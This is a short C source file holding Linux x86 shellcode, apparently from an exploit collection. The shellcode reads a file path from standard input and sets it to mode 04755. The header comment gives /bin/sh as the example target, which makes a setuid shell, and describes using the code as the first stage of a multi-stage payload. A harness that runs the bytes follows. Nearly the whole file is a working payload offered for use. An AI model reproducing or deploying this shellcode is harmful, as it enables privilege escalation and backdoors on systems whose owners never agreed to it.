/* readnchmod-core.c by Charles Stevenson <[email protected]> * * Example of strace output if you pass in "/bin/sh\x00" * read(0, "/bin/sh\0", 2541) = 8 * chmod("/bin/sh", 04755) = 0 * * Any file path can be given. For example: /tmp/.sneakyguy * The only caveat is that the string must be NULL terminated. * This shouldn't be a problem. For multi-stage payloads send * in this first and then you can send it data with null bytes. * I made this for rare cases with tight space contraints and * where read() jmp *%esp is not practical. * */ char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */ "\x31\xdb"// xor %ebx,%ebx "\xf7\xe3"// mul %ebx "\x53"// push %ebx "\xb6\x09"// mov $0x9,%dh "\xb2\xed"// mov $0xed,%dl "\x89\xe1"// mov %esp,%ecx "\xb0\x03"// mov $0x3,%al "\xcd\x80"// int $0x80 "\x89\xd1"// mov %edx,%ecx "\x89\xe3"// mov %esp,%ebx "\xb0\x0f"// mov $0xf,%al "\xcd\x80"// int $0x80 ; int main(void) { void (*shell)() = (void *)&hellcode; printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by core\n", strlen(hellcode)); shell(); return 0; }